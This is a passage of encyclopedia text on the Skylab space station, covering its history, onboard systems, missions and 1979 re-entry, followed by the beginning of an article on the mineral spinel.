million.) In August 1967, the agency announced that the lunar mapping and base construction missions examined by the AAP were being canceled. Only the Earth-orbiting missions remained, namely the Orbital Workshop and Apollo Telescope Mount solar observatory. The success of Apollo 8 in December 1968, launched on the third flight of a Saturn V, made it likely that one would be available to launch a dry workshop. Later, several Moon missions were canceled as well, originally to be Apollo missions 18 through 20. The cancellation of these missions freed up three Saturn V boosters for the AAP program. Although this would have allowed them to develop von Braun's original S-II-based mission, by this time so much work had been done on the S-IV-based design that work continued on this baseline. With the extra power available, the wet workshop was no longer needed; the S-IC and S-II lower stages could launch a "dry workshop", with its interior already prepared, directly into orbit. Habitability A dry workshop simplified plans for the interior of the station. Industrial design firm Raymond Loewy/William Snaith recommended emphasizing habitability and comfort for the astronauts by providing a wardroom for meals and relaxation and a window to view Earth and space, although astronauts were dubious about the designers' focus on details such as color schemes. Habitability had not previously been an area of concern when building spacecraft due to their small size and brief mission durations, but the Skylab missions would last for months. NASA sent a scientist on Jacques Piccard's Ben Franklin submarine in the Gulf Stream in July and August 1969 to learn how six people would live in an enclosed space for four weeks. Astronauts were uninterested in watching movies on a proposed entertainment center or in playing games, but they did want books and individual music choices. Food was also important; early Apollo crews complained about its quality, and a NASA volunteer found it intolerable to live on the Apollo food for four days on Earth. Its taste and composition were unpleasant, in the form of cubes and squeeze tubes. Skylab food significantly improved on its predecessors by prioritizing palatability over scientific needs. For sleeping in space, each astronaut had a private area the size of a small walk-in closet, with a curtain, sleeping bag, and locker. Designers also added a shower and a toilet for comfort and to obtain precise urine and feces samples for examination on Earth. The waste samples were so important that they would have been priorities in any rescue mission. Skylab did not have recycling systems such as the conversion of urine to drinking water; it also did not dispose of waste by dumping it into space. The S-IVB's liquid oxygen tank below the Orbital Work Shop was used to store trash and wastewater, passed through an airlock. Operational history Completion and launch On August 8, 1969, the McDonnell Douglas Corporation received a contract for the conversion of two existing S-IVB stages to the Orbital Workshop configuration. One of the S-IV test stages was shipped to McDonnell Douglas for the construction of a mock-up in January 1970. The Orbital Workshop was renamed "Skylab" in February 1970 as a result of a NASA contest. The actual stage that flew was the upper stage of the AS-212 rocket (the S-IVB stage, S-IVB 212). The mission computer used aboard Skylab was the IBM System/4Pi TC-1, a relative of the AP-101 Space Shuttle computers. The Saturn V with serial number SA-513, originally produced for the Apollo program – before the cancellation of Apollo 18, 19, and 20 – was repurposed and redesigned to launch Skylab. The Saturn V's third stage was removed and replaced with Skylab, but with the controlling Instrument Unit remaining in its standard position. Skylab was launched on May 14, 1973, by the modified Saturn V. The launch is sometimes referred to as Skylab 1. Severe damage was sustained during launch and deployment, including the loss of the station's micrometeoroid shield/sun shade and one of its main solar panels. Debris from the lost micrometeoroid shield further complicated matters by becoming tangled in the remaining solar panel, preventing its full deployment and thus leaving the station with a huge power deficit. Immediately following Skylab's launch, Pad 39A at Kennedy Space Center was deactivated, and construction proceeded to modify it for the Space Shuttle program, originally targeting a maiden launch in March 1979. The crewed missions to Skylab would occur using a Saturn IB rocket from Launch Pad 39B. Skylab 1 was the last uncrewed launch from LC-39A until February 19, 2017, when SpaceX CRS-10 was launched from there. Crewed missions Three crewed missions, designated Skylab 2, Skylab 3, and Skylab 4, were made to Skylab in the Apollo command and service modules. The first crewed mission, Skylab 2, launched on May 25, 1973, atop a Saturn IB and involved extensive repairs to the station. The crew deployed a parasol-like sunshade through a small instrument port from the inside of the station, bringing station temperatures down to acceptable levels and preventing overheating that would have melted the plastic insulation inside the station and released poisonous gases. This solution was designed by Jack Kinzler, who won the NASA Distinguished Service Medal for his efforts. The crew conducted further repairs via two spacewalks (extravehicular activity or EVA). The crew stayed in orbit with Skylab for 28 days. Two additional missions followed, with the launch dates of July 28, 1973, (Skylab 3) and November 16, 1973, (Skylab 4), and mission durations of 59 and 84 days, respectively. The last Skylab crew returned to Earth on February 8, 1974. In addition to the three crewed missions, there was a rescue mission on standby that had a crew of two, but could take five back down. Skylab 2: launched May 25, 1973 Skylab 3: launched July 28, 1973 Skylab 4: launched November 16, 1973 Skylab 5: cancelled Skylab Rescue on standby Also of note was the three-man crew of Skylab Medical Experiment Altitude Test (SMEAT), who spent 56 days in 1972 at low-pressure on Earth to evaluate medical experiment equipment. This was a spaceflight analog test in full gravity, but Skylab hardware was tested and medical knowledge was gained. Orbital operations Originally intended to be visited by one 28–day and two 56–day missions for a total of 140 days, Skylab was ultimately occupied for 171 days and 13 hours during its three crewed expeditions, orbiting the Earth 2,476 times. Each of these extended the human record of 23 days for amount of time spent in space set by the Soviet Soyuz 11 crew aboard the space station Salyut 1 on June 30, 1971. Skylab 2 lasted 28 days, Skylab 3 56 days, and Skylab 4 84 days. Astronauts performed ten spacewalks, totaling 42 hours and 16 minutes. Skylab logged about 2,000 hours of scientific and medical experiments, 127,000 frames of film of the Sun and 46,000 of Earth. Solar experiments included photographs of eight solar flares and produced valuable results that scientists stated would have been impossible to obtain with uncrewed spacecraft. The existence of the Sun's coronal holes was confirmed because of these efforts. Many of the experiments conducted investigated the astronauts' adaptation to extended periods of microgravity. A typical day began at 6 a.m. Central Time Zone. Although the toilet was small and noisy, both veteran astronauts who had endured earlier missions' rudimentary waste-collection systems and rookies complimented it. The first crew enjoyed taking a shower once a week, but found drying themselves in weightlessness and vacuuming excess water difficult; later crews usually cleaned themselves daily with wet washcloths instead of using the shower. Astronauts also found that bending over in weightlessness to put on socks or tie shoelaces strained their abdominal muscles. Breakfast began at 7 a.m. Astronauts usually stood to eat, as sitting in microgravity also strained their abdominal muscles. They reported that their food although greatly improved from Apollo was bland and repetitive, and weightlessness caused utensils, food containers, and bits of food to float away; also, gas in their drinking water contributed to flatulence. After breakfast and preparation for lunch, experiments, tests and repairs of spacecraft systems and, if possible, 90 minutes of physical exercise followed; the station had a bicycle and other equipment, and astronauts could jog around the water tank. After dinner, which was scheduled for 6 p.m., crews performed household chores and prepared for the next day's experiments. Following lengthy daily instructions (some of which were up to 15 meters long) sent via teleprinter, the crews were often busy enough to postpone sleep. The station offered what a later study called "a highly satisfactory living and working environment for crews", with enough room for personal privacy. Although it had a dart set, playing cards, and other recreational equipment in addition to books and music players, the window with its view of Earth became the most popular way to relax in orbit. Experiments Prior to departure about 80 experiments were named, although they are also described as "almost 300 separate investigations". Experiments were divided into six broad categories: Life science – human physiology, biomedical research; circadian rhythms (mice, gnats) Solar physics and astronomy – sun observations (eight telescopes and separate instrumentation); Comet Kohoutek (Skylab 4); stellar observations; space physics Earth resources – mineral resources; geology; hurricanes; land and vegetation patterns Material science – welding, brazing, metal melting; crystal growth; water / fluid dynamics Student research – 19 different student proposals. Several experiments were commended by the crew, including a dexterity experiment and a test of web-spinning by spiders in low gravity. Other – human adaptability, ability to work, dexterity; habitat design/operations. Because the solar scientific airlock – one of two research airlocks – was unexpectedly occupied by the "parasol" that replaced the missing meteorite shield, a few experiments were instead installed outside with the telescopes during spacewalks or shifted to the Earth-facing scientific airlock. Skylab 2 spent less time than planned on most experiments due to station repairs. On the other hand, Skylab 3 and Skylab 4 far exceeded the initial experiment plans, once the crews adjusted to the environment and established comfortable working relationships with ground control. The figure (below) lists an overview of most major experiments. Skylab 4 carried out several more experiments, such as to observe Comet Kohoutek. Astronaut maneuvering equipment As a technology demonstration, the crew practiced flying the Automatically Stabilized Maneuvering Unit (ASMU) inside the spacious dome of the Orbital Workshop. Designed to enable astronauts to perform untethered movements in microgravity. The ASMU tests established key piloting characteristics and capability base for the MMU systems used on the Space Shuttle missions. Nobel Prize Riccardo Giacconi shared the 2002 Nobel Prize in Physics for his study of X-ray astronomy, including the study of emissions from the Sun onboard Skylab, contributing to the birth of X-ray astronomy. Film vaults and window radiation shield Skylab had certain features to protect vulnerable technology from radiation. The window was vulnerable to darkening, and this darkening could affect experiment S190. As a result, a light shield that could be open or shut was designed and installed on Skylab. To protect a wide variety of films, used for a variety of experiments and for astronaut photography, there were five film vaults. There were four smaller film vaults in the Multiple Docking Adapter, mainly because the structure could not carry enough weight for a single larger film vault. The orbital workshop could handle a single larger safe, which is also more efficient for shielding. A later example of a radiation vault is the Juno Radiation Vault for the Juno Jupiter orbiter, launched in 2011, which was designed to protect much of the uncrewed spacecraft's electronics, using 1 cm thick walls of titanium. The large vault in the orbital workshop had an empty mass of . The four smaller vaults had combined mass of . The primary construction material of all five safes was aluminum. When Skylab re-entered there was one chunk of aluminum found that was thought to be a door to one of the film vaults. The large film vault was one of the heaviest single pieces of Skylab to re-enter Earth's atmosphere. The Skylab film vault was used for storing film from various sources including the Apollo Telescope Mount solar instruments. Six ATM experiments used film to record data, and over the course of the missions over 150,000 successful exposures were recorded. The film canister had to be manually retrieved on crewed spacewalks to the instruments during the missions. The film canisters were returned to Earth aboard the Apollo capsules when each mission ended, and were among the heaviest items that had to be returned at the end of each mission. The heaviest canisters weighed 40 kg and could hold up to 16,000 frames of film. Gyroscopes There were two types of gyroscopes on Skylab. Control-moment gyroscopes (CMG) could physically move the station, and rate gyroscopes measured the rate of rotation to find its orientation. The CMG helped provide the fine pointing needed by the Apollo Telescope Mount, and to resist various forces that can change the station's orientation. Some of the forces acting on Skylab that the pointing system needed to resist: Gravity gradient Aerodynamic disturbance Internal movements of crew. Skylab was the first large spacecraft to use big gyroscopes, capable of controlling its attitude. The control could also be used to help point the instruments. The gyroscopes took about ten hours to get spun up if they were turned off. There was also a thruster system to control Skylab's attitude. There were 9 rate-gyroscope sensors, 3 for each axis. These were sensors that fed their output to the Skylab digital computer. Two of three were active and their input was averaged, while the third was a backup. From NASA SP-400 Skylab, Our First Space Station, "each Skylab control-moment gyroscope consisted of a motor-driven rotor, electronics assembly, and power inverter assembly. The rotor weighed and rotated at approximately 8950 revolutions per minute". There were three control moment gyroscopes on Skylab, but only two were required to maintain pointing. The control and sensor gyroscopes were part of a system that help detect and control the orientation of the station in space. Other sensors that helped with this were a Sun tracker and a star tracker. The sensors fed data to the main computer, which could then use the control gyroscopes and or the thruster system to keep Skylab pointed as desired. Shower Skylab had a zero-gravity shower system in the work and experiment section of the Orbital Workshop designed and built at the Manned Spaceflight Center. It had a cylindrical curtain that went from floor to ceiling and a vacuum system to suck away water. The floor of the shower had foot restraints. To bathe, the user coupled a pressurized bottle of warmed water to the shower's plumbing, then stepped inside and secured the curtain. A push-button shower nozzle was connected by a stiff hose to the top of the shower. The system was designed for about 6 pints (2.8 liters) of water per shower, the water being drawn from the personal hygiene water tank. The use of both the liquid soap and water was carefully planned out, with enough soap and warm water for one shower per week per person. The first astronaut to use the space shower was Paul J. Weitz on Skylab 2, the first crewed mission. He said, "It took a fair amount longer to use than you might expect, but you come out smelling good". A Skylab shower took about two and a half hours, including the time to set up the shower and dissipate used water. The procedure for operating the shower was as follows: Fill up the pressurized water bottle with hot water and attach it to the ceiling Connect the hose and pull up the shower curtain Spray down with water Apply liquid soap and spray more water to rinse Vacuum up all the fluids and stow items. One of the big concerns with bathing in space was control of droplets of water so that they did not cause an electrical short by floating into the wrong area. The vacuum water system was thus integral to the shower. The vacuum fed to a centrifugal separator, filter, and collection bag to allow the system to vacuum up the fluids. Waste water was injected into a disposal bag which was in turn put in the waste tank. The material for the shower enclosure was fire-proof beta cloth wrapped around hoops of diameter; the top hoop was connected to the ceiling. The shower could be collapsed to the floor when not in use. Skylab also supplied astronauts with rayon terrycloth towels which had a color-coded stitching for each crew-member. There were 420 towels on board Skylab initially. A simulated Skylab shower was also used during the 56-day SMEAT simulation; the crew used the shower after exercise and found it a positive experience. Cameras and film There was a variety of hand-held and fixed experiments that used various types of film. In addition to the instruments in the ATM solar observatory, 35 and 70 mm film cameras were carried on board. An analog TV camera was carried that recorded video electronically. These electronic signals could be recorded to magnetic tape or be transmitted to Earth by radio signal. It was determined that film would fog up to due to radiation over the course of the mission. To prevent this, film was stored in vaults. Personal (hand-held) camera equipment: Television camera Westinghouse color 25–150 mm zoom 16 mm film camera (Maurer), called the 16 mm Data Acquisition Camera. The DAC was capable of very low frame rates, such as for engineering data films, and it had independent shutter speeds. It could be powered from a battery or from Skylab itself. It used interchangeable lenses, and various lens and also film types were used during the missions. There were different options for frame rates: 2, 4, 6, 12 and 24 frames per second Lenses available: 5, 10, 18, 25, 75, and 100 mm Films used: Ektachrome film SO-368 film SO-168 film Film for the DAC was contained in DAC film magazines, which contained up to 140 feet (42.7 m) of film. At 24 frames per second this was enough for 4 minutes of filming, with progressively longer film times with lower frame rates such as 16 minutes at 6 frames per second. The film had to be loaded or unloaded from the DAC in a photographic dark room. 35 mm film cameras (Nikon) There were 5 Nikon 35 mm film cameras on board, with 55 mm and 300 mm lenses. They were specially modified Nikon F cameras The cameras were capable of interchangeable lenses. 35mm films included: Ektachrome SO-368 SO-168 2485 type film 2443 type film 70 mm film camera (Hasselblad) This had an electric data camera system with Reseau plate Films included 70 mm Ektachrome SO-368 film Lenses: 70 mm lens, 100 mm lens. Experiment S190B was the Actron Earth Terrain Camera. The S190A was the Multispectral Photographic Camera: This consisted of six Itek 70 mm boresighted cameras Lenses were f/2.8 with a 21.2° field of view. There was also a Polaroid SX-70 instant camera, and a pair of Leitz Trinovid 10 × 40 binoculars modified for use in space to aid in Earth observations. The SX-70 was used to take pictures of the Extreme Ultraviolet monitor by Dr. Garriot, as the monitor provided a live video feed of the solar corona in ultraviolet light as observed by Skylab solar observatory instruments located in the Apollo Telescope Mount. Computers Skylab was controlled in part by a digital computer system, and one of its main jobs was to control the pointing of the station; pointing was especially important for its solar power collection and observatory functions. The computer consisted of two actual computers, a primary and a secondary. The system ran several thousand words of code, which was also backed up on the Memory Load Unit (MLU). The two computers were linked to each other and various input and output items by the workshop computer interface. Operations could be switched from the primary to the backup, which were the same design, either automatically if errors were detected, by the Skylab crew, or from the ground. The Skylab computer was a space-hardened and customized version of the TC-1 computer, a version of the IBM System/4 Pi, itself based on the System 360 computer. The TC-1 had a 16,000-word memory based on ferrite memory cores, while the MLU was a read-only tape drive that contained a backup of the main computer programs. The tape drive would take 11 seconds to upload the backup of the software program to a main computer. The TC-1 used 16-bit words and the central processor came from the 4Pi computer. There was a 16k and an 8k version of the software program. The computer had a mass of 100 pounds (45.4 kg), and consumed about ten percent of the station's electrical power. Apollo Telescope Mount Digital Computer Attitude and Pointing Control System (APCS) Memory Load Unit (MLU). After launch the computer is what the controllers on the ground communicated with to control the station's orientation. When the sun-shield was torn off the ground staff had to balance solar heating with electrical production. On March 6, 1978, the computer system was re-activated by NASA to control the re-entry. The system had a user interface that consisted of a display, ten buttons, and a three-position switch. Because the numbers were in octal (base-8), it only had numbers zero to seven (8 keys), and the other two keys were enter and clear. The display could show minutes and seconds which would count down to orbital benchmarks, or it could display keystrokes when using the interface. The interface could be used to change the software program. The user interface was called the Digital Address System (DAS) and could send commands to the computer's command system. The command system could also get commands from the ground. For personal computing needs Skylab crews were equipped with models of the then new hand-held electronic scientific calculator, which was used in place of slide-rules used on prior space missions as the primary personal computer. The model used was the Hewlett Packard HP 35. Some slide rules continued in use aboard Skylab, and a circular slide rule was at the workstation. Plans for re-use after the last mission After nearly 172 days, Skylab considerably exceeded its planned 140 day habitation. The station had held up relatively well, but its onboard supplies were low and its systems were beginning to degrade. One of the three control-moment gyroscopes (CMGs) failed 8 days into Skylab 4, and by the end of the mission another was showing signs of impending failure. With just a single CMG Skylab would be unable to control its attitude, and it was not possible to repair or replace one of the broken gyroscopes on-orbit. Virtually all of the prepackaged food launched with the station had been consumed, Skylab 4's mission extension from 56 to 84 days required the crew take an extra 28 days worth of food with them, but there was still enough water to support three men for 60 days, and enough oxygen/nitrogen to support the same for 140 days. A fourth crewed mission using an Apollo CSM was considered, which would have used the launch vehicle kept on standby for the Skylab Rescue mission. This would have been a 20-day mission to boost Skylab to a higher altitude and do more scientific experiments. Another plan was to use a Teleoperator Retrieval System (TRS) launched aboard the Space Shuttle (then under development), to robotically re-boost the orbit. When Skylab 5 was cancelled, it was expected Skylab would stay in orbit until the 1980s, which was enough time to overlap with the beginning of Shuttle launches. Other options for launching TRS included the Titan III and Atlas-Agena. No option received the level of effort and funding needed for execution before Skylab's sooner-than-expected re-entry. The Skylab 4 crew left a bag filled with supplies to welcome visitors, and left the hatch unlocked. Skylab's internal systems were evaluated and tested from the ground, and effort was put into plans for re-using it, as late as 1978. NASA discouraged any discussion of additional visits due to the station's age, but in 1977 and 1978, when the agency still believed the Space Shuttle would be ready by 1979, it completed two studies on reusing the station. By September 1978, the agency believed Skylab was safe for crews, with all major systems intact and operational. It still had 180 man-days of water and 420-man-days of oxygen, and astronauts could refill both; the station could hold up to about 600 to 700 man-days of drinkable water and 420 man-days of food. Before Skylab 4 left they did one more boost, running the Skylab thrusters for 3 minutes which added 11 km in height to its orbit. Skylab was left in a 433 by 455 km orbit on departure. At this time, the NASA-accepted estimate for its re-entry was nine years. The studies cited several benefits from reusing Skylab, which one called a resource worth "hundreds of millions of dollars" with "unique habitability provisions for long duration space flight". Because no more operational Saturn V rockets were available after the Apollo program, four to five shuttle flights and extensive space architecture would have been needed to build another station as large as Skylab's volume. Its ample size – much greater than that of the shuttle alone, or even the shuttle plus Spacelab – was enough, with some modifications, for up to seven astronauts of both sexes, and experiments needing a long duration in space; even a movie projector for recreation was possible. Proponents of Skylab's reuse also said repairing and upgrading Skylab would provide information on the results of long-duration exposure to space for future stations. The most serious issue for reactivation was attitude control, as one of the station's gyroscopes had failed and the attitude control system needed refueling; these issues would need EVA to fix or replace. The station had not been designed for extensive resupply. However, although it was originally planned that Skylab crews would only perform limited maintenance, they successfully made major repairs during EVA, such as the Skylab 2 crew's deployment of the solar panel and the Skylab 4 crew's repair of the primary coolant loop. The Skylab 2 crew fixed one item during EVA by, reportedly, "hit[ting] it with [a] hammer". Some studies also said, beyond the opportunity for space construction and maintenance experience, reactivating the station would free up shuttle flights for other uses, and reduce the need to modify the shuttle for long-duration missions. Even if the station were not crewed again, went one argument, it might serve as an experimental platform. Shuttle mission plans The reactivation would likely have occurred in four phases: An early Space Shuttle flight would have boosted Skylab to a higher orbit, adding five years of operational life. The shuttle might have pushed or towed the station, but attaching a space tug – the Teleoperator Retrieval System (TRS) – to the station would have been more likely, based on astronauts' training for the task. Martin Marietta won the contract for US$26 million to design the apparatus. TRS would contain about three tons of propellant. The remote-controlled booster had TV cameras and was designed for duties such as space construction and servicing and retrieving satellites the shuttle could not reach. After rescuing Skylab, the TRS would have remained in orbit for future use. Alternatively, it could have been used to de-orbit Skylab for a safe, controlled re-entry and destruction. In two shuttle flights, Skylab would have been refurbished. In January 1982, the first mission would have attached a docking adapter and conducted repairs. In August 1983, a second crew would have replaced several system components. In March 1984, shuttle crews would have attached a solar-powered Power Expansion Package, refurbished scientific equipment, and conducted 30- to 90-day missions using the Apollo Telescope Mount and the Earth resources experiments. Over five years, Skylab would have been expanded to accommodate six to eight astronauts, with a new large docking/interface module, additional logistics modules, Spacelab modules and pallets, and an orbital vehicle space dock using the shuttle's external tank. The first three phases would have required about US$60 million in 1980s dollars, not including launch costs. Other options for launching TRS were Titan III or Atlas-Agena. After departure After a boost of by Skylab 4's Apollo CSM before its departure in 1974, Skylab was left in a parking orbit of by that was expected to last until at least the early 1980s, based on estimates of the 11-year sunspot cycle that began in 1976. In 1962, NASA first considered the potential risks of a space station reentry, but decided not to incorporate a retrorocket system in Skylab due to cost and acceptable risk. The spent 49-ton Saturn V S-II stage which had launched Skylab in 1973 remained in orbit for almost two years, and made a controlled reentry on January 11, 1975. The re-entry was mistimed however and deorbited slightly earlier in the orbit than planned. Solar activity British mathematician Desmond King-Hele of the Royal Aircraft Establishment (RAE) predicted in 1973 that Skylab would de-orbit and crash to Earth in 1979, sooner than NASA's forecast, because of increased solar activity. Greater-than-expected solar activity heated the outer layers of Earth's atmosphere and increased drag on Skylab. By late 1977, NORAD also forecast a reentry in mid-1979; a National Oceanic and Atmospheric Administration (NOAA) scientist criticized NASA for using an inaccurate model for the second most-intense sunspot cycle in a century, and for ignoring NOAA predictions published in 1976. The reentry of the USSR's nuclear powered Cosmos 954 in January 1978, and the resulting radioactive debris fall in northern Canada, drew more attention to Skylab's orbit. Although Skylab did not contain radioactive materials, the State Department warned NASA about the potential diplomatic repercussions of station debris. Battelle Memorial Institute forecast that up to 25 tons of metal debris could land in 500 pieces over an area long and wide. The lead-lined film vault, for example, might land intact at . Ground controllers re-established contact with Skylab in March 1978 and recharged its batteries. Although NASA worked on plans to reboost Skylab with the Space Shuttle through 1978 and the TRS was almost complete, the agency gave up in December 1978 when it became clear that the shuttle would not be ready in time; its first flight, STS-1, did not occur until April 1981. Also rejected were proposals to launch the TRS using one or two uncrewed rockets or to attempt to destroy the station with missiles. Re-entry and debris Skylab's impending demise in 1979 was an international media event, with T-shirts and hats with bullseyes and "Skylab Repellent" with a money-back guarantee, wagering on the time and place of re-entry, and nightly news reports. The San Francisco Examiner offered a US$10,000 prize (equivalent to $ today) for the first piece of Skylab delivered to its offices; the rival San Francisco Chronicle offered US$200,000 ($ today) if a subscriber suffered personal or property damage. A Nebraska neighborhood painted a target so that the station would have "something to aim for", a resident said. The Examiner created the prize to compete with the Chronicle and its popular columnist Herb Caen. Publisher Reg Murphy was reluctant to pay the money, Jeff Jarvis recalled, but NASA assured Jarvis—Caen's counterpart at the Examiner—that the station would not hit land. A report commissioned by NASA calculated that the odds were 1 in 152 of debris hitting any human, and odds of 1 in 7 of debris hitting a city of 100,000 people or more. Special teams were readied to head to any country hit by debris. The event caused so much panic in the Philippines that President Ferdinand Marcos appeared on national television to reassure the public. A week before re-entry, NASA forecast that it would occur between July 10 and 14, with the 12th the most likely date, and the Royal Aircraft Establishment (RAE) predicted the 14th. In the hours before the event, ground controllers adjusted Skylab's orientation to minimize the risk of re-entry on a populated area. They aimed the station at a spot south-southeast of Cape Town, South Africa, and re-entry began at approximately 16:37 UTC, July 11, 1979. The station did not burn up as fast as NASA expected. Debris landed about east of Perth, Western Australia due to a four-percent calculation error, and was found between Esperance, Western Australia and Rawlinna, from 31° to 34° S and 122° to 126° E, about 130–150 km (81–93 miles) radius around Balladonia, Western Australia. Residents and an airline pilot saw dozens of colorful flares as large pieces broke up in the atmosphere; the debris landed in an almost unpopulated area, but the sightings still caused NASA to fear human injury or property damage. Don Lind, in a 2005 interview, reports no human injuries or deaths. Stan Thornton found 24 pieces of Skylab at his home in Esperance. After obtaining his first passport, Thornton flew to San Francisco. After waiting one week for Marshall Space Flight Center to authenticate the wreckage, he collected the Examiner prize and another US$1,000 from a Philadelphia businessman who had flown Thornton's family and girlfriend there. Analysis of the debris showed that the station had disintegrated above the Earth, much lower than expected. The Shire of Esperance light-heartedly fined NASA A$400 for littering, and while the fine was indeed written off three months later, it was nonetheless eventually paid on behalf of NASA in April 2009, after Scott Barley of Highway Radio raised the funds from his morning show listeners. After the demise of Skylab, NASA focused on the reusable Spacelab module, an orbital workshop that could be deployed with the Space Shuttle and returned to Earth. The next American major space station project was Space Station Freedom, which was merged into the International Space Station in 1993 and launched starting in 1998. Shuttle-Mir was another project and led to the US funding Spektr, Priroda, and the Mir Docking Module in the 1990s. Launchers, rescue, and cancelled missions Launchers Launch vehicles: SA-513 (Skylab) SA-206 (Skylab 2) SA-207 (Skylab 3) SA-208 (Skylab 4) SA-209 (Skylab Rescue and Skylab 5, not launched) Skylab Revisit In 1971, before Skylab launched, NASA studied the potential of adding another mission to the three already planned. Called Skylab Revisit, two options were examined. First was an open ended mission that would launch within 30 days after Skylab 4, aiming to last 56 days. The second would visit the station a year after the last crew had left to determine the health and habitability of the station after two years in space. Neither option was rated highly. The first option's chance of mission success was considered uncertain at best, and the second's even worse given the expected dearth of food, water, and oxygen supplies and the degraded condition of Skylab's system after two years in orbit. Skylab Rescue There was a Skylab Rescue mission assembled for the second crewed mission to Skylab, but it was not needed. Another rescue mission was assembled for the last Skylab and was also on standby for ASTP. These missions used a backup Saturn IB rocket (SA-209) and CSM module (CSM-119). Skylab 5 Skylab 5 would have been a short 20-day mission in April 1974 to conduct more scientific experiments and use the Apollo's Service Propulsion System engine to boost Skylab into a higher orbit, supporting later station use by the Space Shuttle. Vance Brand (commander), William B. Lenoir (science pilot), and Don Lind (pilot) would have been the crew for this mission, with Brand and Lind being the prime crew for the Skylab Rescue flights. Brand and Lind also trained for a mission that would have aimed Skylab for a controlled deorbit. Skylab 5 would have used the SA-209 rocket and CMS-119 on standby for Skylab Rescue. Upon its cancellation the rocket was put on display at NASA Kennedy Space Center. Skylab B In addition to the flown Skylab space station, a second flight-quality backup Skylab space station had been built during the program. NASA considered using it for a second station in May 1973 or later, to be called Skylab B (S-IVB 515), but decided against it. Launching another Skylab with another Saturn V rocket would have been very costly, and it was decided to spend this money on the development of the Space Shuttle instead. NASA transferred Skylab B to the National Air and Space Museum in 1975. On display in the museum's Space Hall since 1976, the orbital workshop has been slightly modified to permit viewers to walk through the living quarters. Engineering mock-ups A full-size 1G training mock-up once used for astronaut training is located at the Lyndon B. Johnson Space Center visitor center in Houston, Texas. Another training mockup, originally used at the Neutral Buoyancy Simulator (NBS), is at the U.S. Space & Rocket Center in Huntsville, Alabama. Originally displayed indoors, it was subsequently stored outdoors for several years to make room for other exhibits. To mark the 40th anniversary of the Skylab program, the Orbital Workshop portion of the trainer was restored and moved into the Davidson Center in 2013. Mission designations The numerical identification of the crewed Skylab missions was the cause of some confusion. Originally, the uncrewed launch of Skylab and the three crewed missions to the station were numbered SL-1 through SL-4. During the preparations for the crewed missions, some documentation was created with a different scheme – SLM-1 through SLM-3 – for those missions only. William Pogue credits Pete Conrad with asking the Skylab program director which scheme should be used for the mission patches, and the astronauts were told to use 1–2–3, not 2–3–4. By the time NASA administrators tried to reverse this decision, it was too late, as all the in-flight clothing had already been manufactured and shipped with the 1–2–3 mission patches. L.B. James of NASA Marshall predicted in 1970 that an astronomer, medical doctor, and third scientist might compose each Skylab crew. NASA Astronaut Group 4 and NASA Astronaut Group 6 were scientists recruited as astronauts. They and the scientific community hoped to have two on each Skylab mission, but Deke Slayton, director of flight crew operations, insisted that two trained pilots fly on each. Although the scientists were qualified jet pilots, NASA headquarters made the final decision of one scientist in each Skylab crew on 6 July 1971, after the deaths of three cosmonauts on Soyuz 11. Kerwin was the first Skylab scientist-astronaut. NASA chose a medical doctor to better understand the effect of spaceflight on the human body on a long-duration mission. Astronauts trained for minor medical procedures at a Houston hospital emergency department. SMEAT The Skylab Medical Experiment Altitude Test or SMEAT was a 56-day (8-week) Earth analog Skylab test. The test had a low-pressure high oxygen-percentage atmosphere but it operated under full gravity, as SMEAT was not in orbit. The test had a three-astronaut crew with Commander Robert Crippen, Pilot Karol J. Bobko, and Science Pilot William E. Thornton; there was a focus on medical studies and Thornton was an M.D. The crew lived and worked in the pressure chamber, converted to be like Skylab, from July 26 to September 20, 1972. Program cost From 1966 to 1974, the Skylab program cost a total of US$2.2 billion, (equivalent to $ billion in ). As its three three-person crews spent 510 total man-days in space, each man-day cost approximately US$20 million, compared to US$7.5 million for the International Space Station. Depictions in film A minor storyline of the 1986 film Dogs in Space is an attempt by characters of the Melbourne household to fabricate pieces of Skylab and win a radio station's competition to locate debris from the space station as it fell to earth in Australia. The documentary Searching for Skylab was released online in March 2019. It was written and directed by Dwight Steven-Boniecki and was partly crowdfunded. The alternate history Apple TV+ original series For All Mankind (2019) depicts the use of the space station in the first episode of the second season, surviving to the 1980s and coexisting with the Space Shuttle program in the alternate timeline. In the 2011 film Skylab, a family gathers in France and waits for the station to fall out of orbit. It was directed by Julie Delpy. The 2021 Indian film Skylab depicts fictitious incidents in a Telangana village preceding the disintegration of the space station. The 2024 series Last Days of the Space Age is set in 1979 Western Australia, during Skylab's reentry near Perth.
Technology
Crewed vehicles
null
29467
https://en.wikipedia.org/wiki/Spinel
Spinel
Spinel () is the magnesium/aluminium member of the larger spinel group of minerals. It has the formula in the cubic crystal system. Its name comes from the Latin word , a diminutive form of spine, in reference to its pointed crystals. Properties Spinel crystallizes in the isometric system; common crystal forms are octahedra, usually twinned. It has no true cleavage, but shows an octahedral parting and a conchoidal fracture. Its hardness is 8, its specific gravity is 3.5–4.1, and it is transparent to opaque with a vitreous to dull luster. It may be colorless, but is usually various shades of red, lavender, blue, green, brown, black, or yellow. Chromium(III) causes the red color in spinel from Burma. Some spinels are among the most famous gemstones; among them are the Black Prince's Ruby and the "Timur ruby" in the British Crown Jewels, and the "Côte de Bretagne", formerly from the French Crown jewels. The Samarian Spinel is the largest known spinel in the world, weighing . The transparent red spinels were called spinel-rubies or balas rubies. In the past, before the arrival of modern science, spinels and rubies were equally known as rubies. After the 18th century, the word ruby was only used for the red gem variety of the mineral corundum, and the word spinel came to be used. "Balas" is derived from Balascia, the ancient name for Badakhshan, a region in central Asia situated in the upper valley of the Panj River, one of the principal tributaries of the Oxus River. However, "Balascia" itself may be derived from Sanskrit bālasūryaka, which translates as "crimson-coloured morning sun". Mines in the Gorno Badakhshan region of Tajikistan constituted for centuries the main source for red and pink spinels. Occurrence Geologic occurrence Spinel is found as a metamorphic mineral in metamorphosed limestones and silica-poor mudstones. It also occurs as a primary mineral in rare mafic igneous rocks; in these igneous rocks, the magmas are relatively deficient in alkalis relative to aluminium, and aluminium oxide may form as the mineral corundum or may combine with magnesia to form spinel. This is why spinel and ruby are often found together. The spinel petrogenesis in mafic magmatic rocks is strongly debated, but certainly results from mafic magma interaction with more evolved magma or rock (e.g. gabbro, troctolite). Spinel, , is common in peridotite in the uppermost Earth's mantle, between approximately 20 km to approximately 120 km, possibly to lower depths depending on the chromium content. At significantly shallower depths, above the Moho, calcic plagioclase is the more stable aluminous mineral in peridotite while garnet is the stable phase deeper in the mantle below the spinel stability region. Spinel, , is a common mineral in the Ca-Al-rich inclusions (CAIs) in some chondritic meteorites. Geographical occurrence Spinel has long been found in the gemstone-bearing gravel of Sri Lanka and in limestones of the Badakshan Province in modern-day Afghanistan and 